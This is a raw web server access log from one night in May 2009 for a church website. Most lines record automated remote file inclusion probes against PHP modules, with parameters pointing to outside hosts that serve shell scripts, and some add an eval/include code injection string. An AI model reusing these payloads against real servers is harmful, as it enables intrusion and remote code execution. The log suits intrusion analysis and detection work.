207.182.137.218 - - [31/May/2009:22:36:11 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 358
64.6.231.215 - - [31/May/2009:22:39:08 -0400] "GET /log/sdaglobal.org-access_log.3//?commonpath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 313
64.6.231.215 - - [31/May/2009:22:39:09 -0400] "GET //?commonpath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 200 9432
64.6.231.215 - - [31/May/2009:22:39:08 -0400] "GET /log//?commonpath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 200 58362
222.122.72.93 - - [31/May/2009:22:40:11 -0400] "GET /log/sdaglobal.org-access_log.3//?commonpath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 313
222.122.72.93 - - [31/May/2009:22:40:11 -0400] "GET //?commonpath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 200 9432
222.122.72.93 - - [31/May/2009:22:40:12 -0400] "GET /log//?commonpath=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 200 58362
64.6.231.215 - - [31/May/2009:22:41:45 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 307
64.6.231.215 - - [31/May/2009:22:41:45 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 311
64.6.231.215 - - [31/May/2009:22:41:45 -0400] "GET /log/sdaglobal.org-access_log%20%20//include/admin.lib.inc.php?site_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 338
61.81.93.142 - - [31/May/2009:22:44:00 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
61.81.93.142 - - [31/May/2009:22:44:00 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 325
61.81.93.142 - - [31/May/2009:22:44:04 -0400] "GET /log/sdaglobal.org-access_log.4/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 352
116.36.213.166 - - [31/May/2009:22:46:10 -0400] "GET /log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 333
116.36.213.166 - - [31/May/2009:22:46:15 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 329
62.128.135.52 - - [31/May/2009:22:46:19 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 321
62.128.135.52 - - [31/May/2009:22:46:19 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 290
62.128.135.52 - - [31/May/2009:22:46:19 -0400] "GET /log/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 294
216.120.237.150 - - [31/May/2009:22:46:19 -0400] "GET /log/sdaglobal.org-access_log.2/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 321
216.120.237.150 - - [31/May/2009:22:46:20 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 290
116.36.213.166 - - [31/May/2009:22:46:20 -0400] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 360
216.120.237.150 - - [31/May/2009:22:46:20 -0400] "GET /log/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 294
61.81.93.142 - - [31/May/2009:22:47:00 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354
61.81.93.142 - - [31/May/2009:22:47:05 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 325
61.81.93.142 - - [31/May/2009:22:47:06 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
62.128.135.52 - - [31/May/2009:22:47:22 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 290
88.131.106.4 - - [31/May/2009:22:47:39 -0400] "GET /robots.txt HTTP/1.0" 404 291
88.131.106.4 - - [31/May/2009:22:47:42 -0400] "GET / HTTP/1.0" 304 -
216.120.237.150 - - [31/May/2009:22:47:48 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.interdomain.at/.koma/.cnn?? HTTP/1.1" 404 290
61.81.93.142 - - [31/May/2009:22:47:53 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354
61.81.93.142 - - [31/May/2009:22:47:53 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 325
61.81.93.142 - - [31/May/2009:22:47:55 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
116.36.213.166 - - [31/May/2009:22:50:14 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 362
69.50.197.106 - - [31/May/2009:22:52:05 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 318
69.50.197.106 - - [31/May/2009:22:52:05 -0400] "GET /log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:22:52:12 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 351
69.50.197.106 - - [31/May/2009:22:52:12 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 318
69.50.197.106 - - [31/May/2009:22:52:12 -0400] "GET /log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:22:52:23 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 351
218.188.204.252 - - [31/May/2009:22:56:56 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
219.117.223.106 - - [31/May/2009:22:57:42 -0400] "GET /log/sdaglobal.org-access_log.1//vwar/convert/mvcw.php?step=1&vwar_root=http://backs.thewomanizer.net/remember.txt??? HTTP/1.0" 404 334
69.50.197.106 - - [31/May/2009:22:57:45 -0400] "GET /log/sdaglobal.org-access_log.4//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 349
69.50.197.106 - - [31/May/2009:22:57:49 -0400] "GET /log/sdaglobal.org-access_log.1//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 349
69.50.197.106 - - [31/May/2009:22:57:55 -0400] "GET /log/sdaglobal.org-access_log.4//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 349
121.165.73.157 - - [31/May/2009:22:58:09 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.kilcullen.cz//assets/cache/info.txt? HTTP/1.1" 404 291
99.170.145.151 - - [31/May/2009:23:03:57 -0400] "GET / HTTP/1.1" 200 9432
99.170.145.151 - - [31/May/2009:23:03:57 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
99.170.145.151 - - [31/May/2009:23:03:57 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
99.170.145.151 - - [31/May/2009:23:03:58 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
99.170.145.151 - - [31/May/2009:23:03:58 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
99.170.145.151 - - [31/May/2009:23:03:58 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
99.170.145.151 - - [31/May/2009:23:03:58 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
99.170.145.151 - - [31/May/2009:23:03:58 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/france.gif HTTP/1.1" 200 1094
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/germany.gif HTTP/1.1" 200 986
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/hungary.gif HTTP/1.1" 200 1115
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/india.gif HTTP/1.1" 200 1050
99.170.145.151 - - [31/May/2009:23:03:59 -0400] "GET /images/italy.gif HTTP/1.1" 200 1095
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/japan.gif HTTP/1.1" 200 1104
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/korea.gif HTTP/1.1" 200 1387
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/nepal.gif HTTP/1.1" 200 1130
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/portugal.gif HTTP/1.1" 200 1322
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/russia.gif HTTP/1.1" 200 1039
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/spain.gif HTTP/1.1" 200 1360
99.170.145.151 - - [31/May/2009:23:04:00 -0400] "GET /images/sweden.gif HTTP/1.1" 200 1104
99.170.145.151 - - [31/May/2009:23:04:01 -0400] "GET /images/thailand.gif HTTP/1.1" 200 1060
99.170.145.151 - - [31/May/2009:23:04:01 -0400] "GET /images/vietnam.gif HTTP/1.1" 200 1055
99.170.145.151 - - [31/May/2009:23:04:01 -0400] "GET /images/3abn.gif HTTP/1.1" 200 3774
99.170.145.151 - - [31/May/2009:23:04:01 -0400] "GET /images/vop.jpg HTTP/1.1" 200 2215
99.170.145.151 - - [31/May/2009:23:04:01 -0400] "GET /images/bibsab.gif HTTP/1.1" 200 2786
99.170.145.151 - - [31/May/2009:23:04:01 -0400] "GET /images/hopeint.jpg HTTP/1.1" 200 2596
99.170.145.151 - - [31/May/2009:23:04:02 -0400] "GET /images/iiw.jpg HTTP/1.1" 200 2052
99.170.145.151 - - [31/May/2009:23:04:02 -0400] "GET /images/amazfact.gif HTTP/1.1" 200 2896
99.170.145.151 - - [31/May/2009:23:04:02 -0400] "GET /images/amazdisc.gif HTTP/1.1" 200 3426
99.170.145.151 - - [31/May/2009:23:04:02 -0400] "GET /images/omega.gif HTTP/1.1" 200 956
99.170.145.151 - - [31/May/2009:23:04:02 -0400] "GET /images/promesy.gif HTTP/1.1" 200 2097
99.170.145.151 - - [31/May/2009:23:04:02 -0400] "GET /images/bibplus.gif HTTP/1.1" 200 3598
99.170.145.151 - - [31/May/2009:23:04:03 -0400] "GET /images/hopetalk.gif HTTP/1.1" 200 3618
99.170.145.151 - - [31/May/2009:23:04:03 -0400] "GET /images/knowjes.gif HTTP/1.1" 200 3848
99.170.145.151 - - [31/May/2009:23:04:03 -0400] "GET /images/teachart.gif HTTP/1.1" 200 1484
99.170.145.151 - - [31/May/2009:23:04:03 -0400] "GET /images/gawake.gif HTTP/1.1" 200 3422
99.170.145.151 - - [31/May/2009:23:04:03 -0400] "GET /images/crusade.jpg HTTP/1.1" 200 4146
99.170.145.151 - - [31/May/2009:23:04:03 -0400] "GET /images/coming.jpg HTTP/1.1" 200 4137
99.170.145.151 - - [31/May/2009:23:04:04 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
99.170.145.151 - - [31/May/2009:23:04:04 -0400] "GET /images/voh.gif HTTP/1.1" 200 2001
99.170.145.151 - - [31/May/2009:23:04:04 -0400] "GET /images/nimenqu.gif HTTP/1.1" 200 3797
99.170.145.151 - - [31/May/2009:23:04:04 -0400] "GET /images/lamb.gif HTTP/1.1" 200 1920
66.199.250.194 - - [31/May/2009:23:11:16 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 356
66.199.250.194 - - [31/May/2009:23:11:16 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 325
66.199.250.194 - - [31/May/2009:23:11:16 -0400] "GET /log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 329
66.199.250.194 - - [31/May/2009:23:15:53 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 356
195.34.78.110 - - [31/May/2009:23:15:58 -0400] "GET /log/sdaglobal.org-access_log.4/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 356
195.34.78.110 - - [31/May/2009:23:15:58 -0400] "GET /log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 329
195.34.78.110 - - [31/May/2009:23:15:59 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 325
121.165.73.157 - - [31/May/2009:23:16:13 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 314
121.165.73.157 - - [31/May/2009:23:16:13 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_forum/download.php?phpbb_root_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 347
121.165.73.157 - - [31/May/2009:23:16:13 -0400] "GET /log/components/com_forum/download.php?phpbb_root_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 318
72.30.79.32 - - [31/May/2009:23:17:01 -0400] "GET /grtdebas.htm HTTP/1.0" 200 28342
121.165.73.157 - - [31/May/2009:23:17:53 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_forum/download.php?phpbb_root_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 347
195.34.78.110 - - [31/May/2009:23:18:25 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 356
89.234.63.110 - - [31/May/2009:23:19:05 -0400] "GET /log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 332
89.234.63.110 - - [31/May/2009:23:19:05 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 328
89.234.63.110 - - [31/May/2009:23:20:12 -0400] "GET /log/sdaglobal.org-access_log.3///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 359
89.234.63.110 - - [31/May/2009:23:20:17 -0400] "GET /log/sdaglobal.org-access_log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 357
74.208.111.178 - - [31/May/2009:23:21:18 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343
74.208.111.178 - - [31/May/2009:23:21:18 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
74.208.111.178 - - [31/May/2009:23:21:20 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 314
195.34.78.110 - - [31/May/2009:23:21:51 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 358
195.34.78.110 - - [31/May/2009:23:22:41 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 358
69.50.197.106 - - [31/May/2009:23:23:28 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
69.50.197.106 - - [31/May/2009:23:23:28 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 314
69.50.197.106 - - [31/May/2009:23:23:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343
69.50.197.106 - - [31/May/2009:23:23:28 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343
69.50.197.106 - - [31/May/2009:23:23:28 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 310
69.50.197.106 - - [31/May/2009:23:23:28 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 314
218.146.255.11 - - [31/May/2009:23:24:04 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 325
218.146.255.11 - - [31/May/2009:23:24:04 -0400] "GET /log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 329
218.146.255.11 - - [31/May/2009:23:24:06 -0400] "GET /log/sdaglobal.org-access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 354
69.50.197.106 - - [31/May/2009:23:26:46 -0400] "GET /log/sdaglobal.org-access_log.1//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 341
116.36.213.166 - - [31/May/2009:23:28:45 -0400] "GET /log/sdaglobal.org-error_log.4/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 341
116.36.213.166 - - [31/May/2009:23:28:48 -0400] "GET /log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 315
116.36.213.166 - - [31/May/2009:23:28:51 -0400] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 311
116.36.213.166 - - [31/May/2009:23:30:42 -0400] "GET /log/sdaglobal.org-error_log.4%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 343
116.36.213.166 - - [31/May/2009:23:30:43 -0400] "GET /log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 315
116.36.213.166 - - [31/May/2009:23:30:45 -0400] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 311
89.234.63.110 - - [31/May/2009:23:31:48 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 325
89.234.63.110 - - [31/May/2009:23:31:48 -0400] "GET /log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 329
89.234.63.110 - - [31/May/2009:23:31:49 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 325
89.234.63.110 - - [31/May/2009:23:31:49 -0400] "GET /log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 329
195.34.78.110 - - [31/May/2009:23:33:25 -0400] "GET /log/sdaglobal.org-access_log%20%20//?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 313
195.34.78.110 - - [31/May/2009:23:33:25 -0400] "GET /log//?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 58362
195.34.78.110 - - [31/May/2009:23:33:26 -0400] "GET //?_zb_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 9432
70.84.212.26 - - [31/May/2009:23:33:47 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright? HTTP/1.1" 404 325
70.84.212.26 - - [31/May/2009:23:33:47 -0400] "GET /log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright? HTTP/1.1" 404 329
70.84.212.26 - - [31/May/2009:23:33:49 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright? HTTP/1.1" 404 325
70.84.212.26 - - [31/May/2009:23:33:49 -0400] "GET /log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright? HTTP/1.1" 404 329
